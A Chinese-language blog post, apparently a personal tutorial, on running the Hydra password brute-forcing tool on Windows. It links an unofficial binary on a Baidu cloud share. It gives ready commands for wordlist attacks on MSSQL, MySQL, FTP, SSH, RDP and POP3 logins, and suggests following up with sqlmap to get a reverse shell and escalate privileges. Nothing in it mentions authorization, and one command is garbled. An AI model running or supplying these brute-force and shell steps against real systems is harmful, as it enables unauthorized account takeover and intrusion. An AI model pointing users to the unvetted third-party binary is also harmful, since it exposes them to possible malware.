暴力破解工具 Hydra （九头蛇） windows最新版下载和

我看网上说好像从8.0版本起，官方只支持linux版的了，想用windows版的只能自己编译了，虽然和linux环境下比起来真的是慢了点，但是还是可以一解燃眉之急啊，在网上找了半天，终于找到了8.1版本的九头蛇，感谢这位大神的分享

windows版本下载地址：http://pan.baidu.com/s/1mg1nqQk密码：nxkf

下载解压后在软件文件目录里面创建cmd.bat    打开输入：hydra.exe 就可以查看命令行帮助界面了（自带的hydra.exe使用的时候闪退 --win10）

我个人喜欢C/S架构破解的时候使用hydra，搭配nmap和sqlmap；

下面举几个命令的使用例子：

一般习惯用nmap扫一下主机，比如发现开放了1433端口（一般就是sql server 了  nmap -A 看看是不是真的运行了sql server服务 ）

之后：

hydra.exe -l sa -P d:\pass.txt 127.0.0.1 mssql

这个命令的意思就是 “d:\pass.txt” 是密码字典路径 hydra就开始遍历这个字典里面的所有字符串。

如图：

然后：

使用sqlmap连接，并且反弹与系统交互的shell方便提权。

语法很多 但是十分简单：

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]

（网上找的 凑合看吧）

下面列举几个hydra 破解命令：

破解mysql：

hydra.exe -L d:\user.txt -Pd:\pass.txt127.0.0.1 mysql

-L:指定用户名文件  -P：指定密码文件

破解FTP：

hydra.exe -l admin -P c:\pass.txt -t 5 127.0.0.1 ftp

-l：指定用户名  -t：指定线程

破解ssh：

hydra.exe -L users.txt -P password.txt -e n -t 5 -vV 127.0.0.1 ssh

"-e n":对空密码探测

破解rdp：

hydra.exe -l administror -P c:\pass.txt www.test.com rdp -V

破解www.test.com的rdp服务（远程桌面协议）。

破解pop3：

hydra.exe -l root -P pass.txt my.pop3.mail pop3

注意：未指定文件路径时，Hydra将会在本目录下查找文件。

能力有限，有错必纠。

码字好累的，转载请注明。